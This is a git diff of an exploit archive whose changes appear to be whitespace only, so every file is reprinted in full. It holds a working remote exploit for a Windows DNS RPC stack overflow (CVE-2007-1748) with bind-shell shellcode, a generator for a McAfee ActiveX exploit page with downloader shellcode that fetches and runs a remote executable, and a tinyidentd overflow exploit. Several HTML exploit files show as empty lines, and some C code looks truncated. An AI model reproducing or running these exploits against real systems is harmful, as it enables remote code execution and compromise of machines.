-       "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90"
-       "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96"
-       "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02"
-       "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85"
-       "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d"
-       "\x7d\xe0\xa6\xd2\xab\x1f\x00";
-
-/* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */
-unsigned char uszDceBind[] =
-       "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
-       "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
-       "\xA4\xC2\xAB\x50\x4D\x57\xB3\x40\x9D\x66\xEE\x4F\xD5\xFB\xA0\x76"
-       "\x05\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
-       "\x2B\x10\x48\x60\x02\x00\x00\x00";
-
-/* DnssrvQuery: opnum 1 */
-unsigned char uszDceCall[] =
-       "\x05\x00\x00\x83\x10\x00\x00\x00\x7f\x06\x00\x00\x01\x00\x00\x00"
-       "\x57\x06\x00\x00\x00\x00\x01\x00\xa4\xc2\xab\x50\x4d\x57\xb3\x40"
-       "\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x10\xc2\x40\x00\x02\x00\x00\x00"
-       "\x00\x00\x00\x00\x02\x00\x00\x00\x44\x00\x00\x00\x94\xfa\x13\x00"
-       "\xcc\x04\x00\x00\x00\x00\x00\x00\xcc\x04\x00\x00";
-
-unsigned char uszDceEnd1[] =
-       "\x41\x00\xb8\xc0\x40\x00\x57\x01\x00\x00\x00\x00\x00\x00\x57\x01"
-       "\x00\x00";
-
-unsigned char uszJmps[] =
-       /* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */
-       "\x5C\x29\x5C\x4C\x5C\xE1\x5C\x77"
-
-       /* inc edx, jmp edx */
-       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
-       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
-       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
-       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
-       "\x5C\x42\x5C\xFF\x5C\xE2";
-
-void usage( ) {
-       printf("\n\t\tMicrosoft Windows DNS RPC Stack Overflow\n"
-                       "\t\t\t(c) 2007 devcode\n\n"
-                       "usage: dns.exe  \n");
-}
-
-int main( int argc, char **argv ) {
-       WSADATA wsaData;
-       SOCKET sConnect;
-       SOCKADDR_IN sockAddr;
-       char szRecvBuf[4096];
-       unsigned char uszPacket[1663];
-       int nRet;
-
-       if ( argc < 3 ) {
-               usage( );
-               return -1;
-       }
-
-       if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
-               printf("[-] Unable to startup winsock\n");
-               return -1;
-       }
-
-       sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
-       if ( sConnect == INVALID_SOCKET ) {
-               printf("[-] Invalid socket\n");
-               return -1;
-       }
-
-       sockAddr.sin_family = AF_INET;
-       sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
-       sockAddr.sin_port = htons( atoi( argv[2] ) );
-
-       printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
-       nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
-       if ( nRet == SOCKET_ERROR ) {
-               closesocket( sConnect );
-               printf("[-] Cannot connect to server\n");
-               return -1;
-       }
-
-       printf("[+] Sending DCE Bind packet...\n");
-       nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
-       if ( nRet  == SOCKET_ERROR ) {
-               closesocket( sConnect );
-               printf("[-] Cannot send\n");
-               return -1;
-       }
-
-       nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
-       if ( nRet <= 0 ) {
-               closesocket( sConnect );
-               printf("[-] Recv failed\n");
-               return -1;
-       }
-
-       memset( uszPacket, 0x5C, sizeof( uszPacket ) );
-       memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 );
-       memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 );
-       memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) );
-       memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) );
-
-       printf("[+] Sending DCE Request packet...\n");
-       nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
-       if ( nRet == SOCKET_ERROR ) {
-               closesocket( sConnect );
-               printf("[-] Cannot send\n");
-               return -1;
-       }
-
-       printf("[+] Check shell on port 4444 :)\n");
-       nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
-       closesocket( sConnect );
-       return 0;
-}
-
-// milw0rm.com [2007-04-15]
+/*
+* Copyright (c) 2007 devcode
+*
+*
+*                       ^^ D E V C O D E ^^
+*
+* Windows DNS DnssrvQuery() Stack Overflow
+* [CVE-2007-1748]
+*
+*
+* Description:
+*    A vulnerability has been reported in Microsoft Windows, which can
+*    be exploited by malicious people to compromise a vulnerable system.
+*    The vulnerability is caused due to a boundary error in an RPC interface
+*    of the DNS service used for remote management of the service. This can
+*    be exploited to cause a stack-based buffer overflow via a specially
+*    crafted RPC request. The DnssrvQuery function is vulnerable to this stack
+*    overflow.
+*
+*
+* Hotfix/Patch:
+*    None as of this time.
+*
+* Vulnerable systems:
+*         Microsoft Windows 2000 Advanced Server
+*    	  Microsoft Windows 2000 Datacenter Server
+*         Microsoft Windows 2000 Server
+*         Microsoft Windows Server 2003 Datacenter Edition
+*         Microsoft Windows Server 2003 Enterprise Edition
+*         Microsoft Windows Server 2003 Standard Edition
+*         Microsoft Windows Server 2003 Web Edition
+*         Microsoft Windows Storage Server 2003
+*
+* Tested on:
+*         Microsoft Windows 2000 Advanced Server
+*
+*    This is a PoC and was created for educational purposes only. The
+*    author is not held responsible if this PoC does not work or is
+*    used for any other purposes than the one stated above.
+*
+* Notes:
+*    <3 Metasploit for releasing it yesterday, only had time to look at it
+*    this morning. Also props to Winny Thomas.
+*
+*    There are two ways we can embed shellcode. One is to pad each byte of
+*    the shellcode with '\' and jmp EBX. The other way is the one Winny used
+*    which is to pass in the shellcode as the third argument in the rpc function
+*    and jmp EDX after incrementing it appropriately. I used the latter :)
+*
+*    ^^ #pen15, InTeL, D-oNe and ps. St0n3y is nub kthxbye
+*
+*
+*/
+#include 
+#include 
+
+#pragma comment( lib, "ws2_32" )
+
+/* win32_bind -  EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov
+http://metasploit.com */
+unsigned char uszShellcode[] =
+       "\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab"
+       "\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2"
+       "\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca"
+       "\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56"
+       "\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37"
+       "\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe"
+       "\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde"
+       "\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04"
+       "\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19"
+       "\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8"
+       "\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81"
+       "\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba"
+       "\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f"
+       "\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d"
+       "\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04"
+       "\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb"
+       "\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90"
+       "\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96"
+       "\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02"
+       "\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85"
+       "\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d"
+       "\x7d\xe0\xa6\xd2\xab\x1f\x00";
+
+/* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */
+unsigned char uszDceBind[] =
+       "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
+       "\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
+       "\xA4\xC2\xAB\x50\x4D\x57\xB3\x40\x9D\x66\xEE\x4F\xD5\xFB\xA0\x76"
+       "\x05\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
+       "\x2B\x10\x48\x60\x02\x00\x00\x00";
+
+/* DnssrvQuery: opnum 1 */
+unsigned char uszDceCall[] =
+       "\x05\x00\x00\x83\x10\x00\x00\x00\x7f\x06\x00\x00\x01\x00\x00\x00"
+       "\x57\x06\x00\x00\x00\x00\x01\x00\xa4\xc2\xab\x50\x4d\x57\xb3\x40"
+       "\x9d\x66\xee\x4f\xd5\xfb\xa0\x76\x10\xc2\x40\x00\x02\x00\x00\x00"
+       "\x00\x00\x00\x00\x02\x00\x00\x00\x44\x00\x00\x00\x94\xfa\x13\x00"
+       "\xcc\x04\x00\x00\x00\x00\x00\x00\xcc\x04\x00\x00";
+
+unsigned char uszDceEnd1[] =
+       "\x41\x00\xb8\xc0\x40\x00\x57\x01\x00\x00\x00\x00\x00\x00\x57\x01"
+       "\x00\x00";
+
+unsigned char uszJmps[] =
+       /* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */
+       "\x5C\x29\x5C\x4C\x5C\xE1\x5C\x77"
+
+       /* inc edx, jmp edx */
+       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
+       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
+       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
+       "\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42\x5C\x42"
+       "\x5C\x42\x5C\xFF\x5C\xE2";
+
+void usage( ) {
+       printf("\n\t\tMicrosoft Windows DNS RPC Stack Overflow\n"
+                       "\t\t\t(c) 2007 devcode\n\n"
+                       "usage: dns.exe  \n");
+}
+
+int main( int argc, char **argv ) {
+       WSADATA wsaData;
+       SOCKET sConnect;
+       SOCKADDR_IN sockAddr;
+       char szRecvBuf[4096];
+       unsigned char uszPacket[1663];
+       int nRet;
+
+       if ( argc < 3 ) {
+               usage( );
+               return -1;
+       }
+
+       if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
+               printf("[-] Unable to startup winsock\n");
+               return -1;
+       }
+
+       sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+       if ( sConnect == INVALID_SOCKET ) {
+               printf("[-] Invalid socket\n");
+               return -1;
+       }
+
+       sockAddr.sin_family = AF_INET;
+       sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
+       sockAddr.sin_port = htons( atoi( argv[2] ) );
+
+       printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
+       nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
+       if ( nRet == SOCKET_ERROR ) {
+               closesocket( sConnect );
+               printf("[-] Cannot connect to server\n");
+               return -1;
+       }
+
+       printf("[+] Sending DCE Bind packet...\n");
+       nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
+       if ( nRet  == SOCKET_ERROR ) {
+               closesocket( sConnect );
+               printf("[-] Cannot send\n");
+               return -1;
+       }
+
+       nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
+       if ( nRet <= 0 ) {
+               closesocket( sConnect );
+               printf("[-] Recv failed\n");
+               return -1;
+       }
+
+       memset( uszPacket, 0x5C, sizeof( uszPacket ) );
+       memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 );
+       memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 );
+       memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) );
+       memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) );
+
+       printf("[+] Sending DCE Request packet...\n");
+       nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
+       if ( nRet == SOCKET_ERROR ) {
+               closesocket( sConnect );
+               printf("[-] Cannot send\n");
+               return -1;
+       }
+
+       printf("[+] Check shell on port 4444 :)\n");
+       nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
+       closesocket( sConnect );
+       return 0;
+}
+
+// milw0rm.com [2007-04-15]
diff --git a/platforms/windows/remote/378.pl b/platforms/windows/remote/378.pl
index f00dbffde..776f04db6 100755
--- a/platforms/windows/remote/378.pl
+++ b/platforms/windows/remote/378.pl
@@ -109,6 +109,6 @@ $res .= $_;
 if (/$repcode/) { last; }
 }
 return $res;
-}
-
-# milw0rm.com [2004-08-05]
+}
+
+# milw0rm.com [2004-08-05]
diff --git a/platforms/windows/remote/3810.html b/platforms/windows/remote/3810.html
index 6b490499f..8cc328c3d 100755
--- a/platforms/windows/remote/3810.html
+++ b/platforms/windows/remote/3810.html
@@ -1,83 +1,83 @@
-
-
-
-
-
-
-
- 
-
-
-
-
-
-# milw0rm.com [2007-04-27]
+
+
+
+
+
+
+
+ 
+
+
+
+
+
+# milw0rm.com [2007-04-27]
diff --git a/platforms/windows/remote/3877.html b/platforms/windows/remote/3877.html
index e26688349..eb5fac388 100755
--- a/platforms/windows/remote/3877.html
+++ b/platforms/windows/remote/3877.html
@@ -1,79 +1,79 @@
-
-
-
-
-
-
- IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit - By Umesh Wanve
-
-
-
-
- 
-
-
-
-
-
-# milw0rm.com [2007-05-08]
+
+
+
+
+
+
+ IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit - By Umesh Wanve
+
+
+
+
+ 
+
+
+
+
+
+# milw0rm.com [2007-05-08]
diff --git a/platforms/windows/remote/3880.html b/platforms/windows/remote/3880.html
index 3135c6b95..3a36fa0a4 100755
--- a/platforms/windows/remote/3880.html
+++ b/platforms/windows/remote/3880.html
@@ -1,75 +1,75 @@
-
-
-
-
-
-
-
- 
-
-
-
-
-
-# milw0rm.com [2007-05-09]
+
+
+
+
+
+
+
+ 
+
+
+
+
+
+# milw0rm.com [2007-05-09]
diff --git a/platforms/windows/remote/3881.html b/platforms/windows/remote/3881.html
index 87ebeceb0..e68d7a545 100755
--- a/platforms/windows/remote/3881.html
+++ b/platforms/windows/remote/3881.html
@@ -1,72 +1,72 @@
-
-
-
-
-
-
-
- 
-
-
-
-
-
-# milw0rm.com [2007-05-09]
+
+
+
+
+
+
+
+ 
+
+
+
+
+
+# milw0rm.com [2007-05-09]
diff --git a/platforms/windows/remote/3893.c b/platforms/windows/remote/3893.c
index 2aefb36f3..9d7fdd8ab 100755
--- a/platforms/windows/remote/3893.c
+++ b/platforms/windows/remote/3893.c
@@ -1,193 +1,193 @@
-/*
-	McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability
-	
-	Peel the frame from axis,Thanks
-	
-	Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15
-
-	Greetz to OYXin, sowhat, Winny Thomas and 0x557 team
-*/
-
-#include 
-#include 
-#include 
-
-FILE *fp = NULL;
-char *file = "McAfee_exploit.html";
-char *url = NULL;
-
-//Downloader shellcode
-unsigned char sc[] = 
-"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x3c\x01\x80\x34\x0B\x99\xE2\xFA"
-"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x34\x99\x99\x99\xC3\x12\x6B\xAA"
-"\x59\x35\xA4\x01\x99\x99\x99\xEC\x6F\x18\x75\x51\x99\x99\x99\x12"
-"\x6D\x10\xCF\xBD\x71\x0C\x99\x99\x99\xAA\x42\x10\x9F\x66\xAF\xF1"
-"\x17\xD7\x97\x75\x71\x34\x99\x99\x99\x10\xDF\x91\xF1\xF5\xF5\x99"
-"\x99\xF1\xF6\xF7\xB7\xFD\xF1\xEC\xEB\xF5\xF4\xCD\x66\xCF\x91\x10"
-"\xDF\x9D\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x11\x99\x99\x99\x10\xDF"
-"\x95\x66\xAF\xF1\x01\x67\x13\x97\x71\xE0\x99\x99\x99\x10\xDF\x8D"
-"\x66\xAF\xF1\xBC\x29\x66\x5B\x71\xF3\x99\x99\x99\x10\xDF\x81\x66"
-"\xEF\x9D\xF1\xAF\x83\xB6\xE9\x71\xC3\x99\x99\x99\x10\xDF\x89\xF3"
-"\xFC\xF1\xEA\xB7\xFC\xE1\x10\xFF\x85\x66\xEF\x85\x66\xCF\x81\xAA"
-"\x50\xC8\xC8\x66\xEF\x85\x66\xEF\xBD\xC8\x66\xCF\x89\xAA\x50\xC8"
-"\x66\xEF\x85\x66\xCF\x8D\x66\xCF\x95\x70\x19\x99\x99\x99\xCC\xCF"
-"\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12\xE9\x85"
-"\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99\x99\x12"
-"\x5C\xC7\xC4\x5B\x9D\x99\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC"
-"\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A\x44\x7A"
-"\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3\x5D\xED"
-"\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3"
-"\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A"
-"\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99\x71\x50"
-"\x67\x66\x66";
-unsigned char sc_2[] = "\x98";
-
-char * header =
-"\n\n"
-
-"\n"
-"\n"
-"\n"
-"\n";
-
-
-
-char * trigger_1 =
-"\n"
-"\n";
-
-
-// print unicode shellcode
-void PrintPayLoad(char *lpBuff, int buffsize)
-{
-int i;
-for(i=0;i\n");
-	printf("#\ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>\n");
-	printf("#\tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.html\n");
-	printf("#\t100%% successful\? who knows\;\)\n");
-	printf("\r\nUsage: %s  [htmlfile]\n", argv[0]);
-	printf("\r\nE.g.: %s http://www.fakename.com/hello.exe exploit.html\r\n\n", argv[0]);
-exit(1);
-}
-
-url = argv[1];
-
-
-if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
-{
-printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
-return; 
-}
-
-printf("[+] download url:%s\n", url);
-
-if(argc >=3) file = argv[2];
-printf("[+] exploit file:%s\n", file);
-
-fp = fopen(file, "w");
-if(!fp)
-{
-printf("[-] Open file error!\n");
-return;
-} 
-
-
-//build evil html file
-fprintf(fp, "%s", header);
-fflush(fp);
-
-memset(buf, 0, sizeof(buf));
-sc_len = sizeof(sc)-1;
-memcpy(buf, sc, sc_len);
-memcpy(buf+sc_len, url, strlen(url));
-
-sc_len += strlen(url);
-
-memcpy(buf+sc_len, sc_2, 1);
-sc_len += 1;
-
-PrintPayLoad((char *)buf, sc_len);
-
-fprintf(fp, "%s", footer);
-fflush(fp); 
-
-fprintf(fp, "%s", trigger_1);
-fflush(fp); 
-
-
-printf("[+] exploit write to %s success!\n", file);
-}
-
-// milw0rm.com [2007-05-10]
+/*
+	McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability
+	
+	Peel the frame from axis,Thanks
+	
+	Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15
+
+	Greetz to OYXin, sowhat, Winny Thomas and 0x557 team
+*/
+
+#include 
+#include 
+#include 
+
+FILE *fp = NULL;
+char *file = "McAfee_exploit.html";
+char *url = NULL;
+
+//Downloader shellcode
+unsigned char sc[] = 
+"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x3c\x01\x80\x34\x0B\x99\xE2\xFA"
+"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x34\x99\x99\x99\xC3\x12\x6B\xAA"
+"\x59\x35\xA4\x01\x99\x99\x99\xEC\x6F\x18\x75\x51\x99\x99\x99\x12"
+"\x6D\x10\xCF\xBD\x71\x0C\x99\x99\x99\xAA\x42\x10\x9F\x66\xAF\xF1"
+"\x17\xD7\x97\x75\x71\x34\x99\x99\x99\x10\xDF\x91\xF1\xF5\xF5\x99"
+"\x99\xF1\xF6\xF7\xB7\xFD\xF1\xEC\xEB\xF5\xF4\xCD\x66\xCF\x91\x10"
+"\xDF\x9D\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x11\x99\x99\x99\x10\xDF"
+"\x95\x66\xAF\xF1\x01\x67\x13\x97\x71\xE0\x99\x99\x99\x10\xDF\x8D"
+"\x66\xAF\xF1\xBC\x29\x66\x5B\x71\xF3\x99\x99\x99\x10\xDF\x81\x66"
+"\xEF\x9D\xF1\xAF\x83\xB6\xE9\x71\xC3\x99\x99\x99\x10\xDF\x89\xF3"
+"\xFC\xF1\xEA\xB7\xFC\xE1\x10\xFF\x85\x66\xEF\x85\x66\xCF\x81\xAA"
+"\x50\xC8\xC8\x66\xEF\x85\x66\xEF\xBD\xC8\x66\xCF\x89\xAA\x50\xC8"
+"\x66\xEF\x85\x66\xCF\x8D\x66\xCF\x95\x70\x19\x99\x99\x99\xCC\xCF"
+"\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12\xE9\x85"
+"\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99\x99\x12"
+"\x5C\xC7\xC4\x5B\x9D\x99\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC"
+"\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A\x44\x7A"
+"\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3\x5D\xED"
+"\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3"
+"\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A"
+"\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99\x71\x50"
+"\x67\x66\x66";
+unsigned char sc_2[] = "\x98";
+
+char * header =
+"\n\n"
+
+"\n"
+"\n"
+"\n"
+"\n";
+
+
+
+char * trigger_1 =
+"\n"
+"\n";
+
+
+// print unicode shellcode
+void PrintPayLoad(char *lpBuff, int buffsize)
+{
+int i;
+for(i=0;i\n");
+	printf("#\ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>\n");
+	printf("#\tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.html\n");
+	printf("#\t100%% successful\? who knows\;\)\n");
+	printf("\r\nUsage: %s  [htmlfile]\n", argv[0]);
+	printf("\r\nE.g.: %s http://www.fakename.com/hello.exe exploit.html\r\n\n", argv[0]);
+exit(1);
+}
+
+url = argv[1];
+
+
+if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
+{
+printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
+return; 
+}
+
+printf("[+] download url:%s\n", url);
+
+if(argc >=3) file = argv[2];
+printf("[+] exploit file:%s\n", file);
+
+fp = fopen(file, "w");
+if(!fp)
+{
+printf("[-] Open file error!\n");
+return;
+} 
+
+
+//build evil html file
+fprintf(fp, "%s", header);
+fflush(fp);
+
+memset(buf, 0, sizeof(buf));
+sc_len = sizeof(sc)-1;
+memcpy(buf, sc, sc_len);
+memcpy(buf+sc_len, url, strlen(url));
+
+sc_len += strlen(url);
+
+memcpy(buf+sc_len, sc_2, 1);
+sc_len += 1;
+
+PrintPayLoad((char *)buf, sc_len);
+
+fprintf(fp, "%s", footer);
+fflush(fp); 
+
+fprintf(fp, "%s", trigger_1);
+fflush(fp); 
+
+
+printf("[+] exploit write to %s success!\n", file);
+}
+
+// milw0rm.com [2007-05-10]
diff --git a/platforms/windows/remote/3925.py b/platforms/windows/remote/3925.py
index 74f6e764d..5b4d2f490 100755
--- a/platforms/windows/remote/3925.py
+++ b/platforms/windows/remote/3925.py
@@ -1,59 +1,59 @@
-#
-#tinyidentd exploit code by
-#thomas . pollet _at_ gmail . com
-#bug by Maarten Boone
-#
-#usage: python exploit.py [target]
-#
-import socket,sys
-#jmp into nop sled
-payload  = '\xeb\x20'  
-#ident crap
-payload += ', 28 : USERID : UNIX : '
-#nop sled
-payload +='XXXX'
-# jmp *%esi
-payload += '\x77\x13\x83\x7c'  #XP kernel32.dll
-#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll
-#metasploit alphanumeric shellcode calc.exe
-shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44"
-shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42"
-shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b"
-shellcode += "\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x35\x35\x6c\x4e"
-shellcode += "\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x4b\x52\x6f\x46"
-shellcode += "\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x49\x6c\x4b\x54"
-shellcode += "\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x39\x4c\x6c\x4d"
-shellcode += "\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x4d\x63\x31\x79"
-shellcode += "\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x64\x31\x65\x4a"
-shellcode += "\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x46\x6e\x6b\x64"
-shellcode += "\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x6b\x4c\x4b\x57"
-shellcode += "\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x74\x67\x74\x4a"
-shellcode += "\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x30\x4f\x75\x4f"
-shellcode += "\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x4b\x70\x70\x57"
-shellcode += "\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x69\x6c\x4b\x4d"
-shellcode += "\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x38\x35\x6c\x41"
-shellcode += "\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x48\x6f\x73\x6f"
-shellcode += "\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x74\x51\x4f\x45"
-shellcode += "\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x6f\x38\x67\x73"
-shellcode += "\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x78\x70\x65\x45"
-shellcode += "\x50\x44"
-
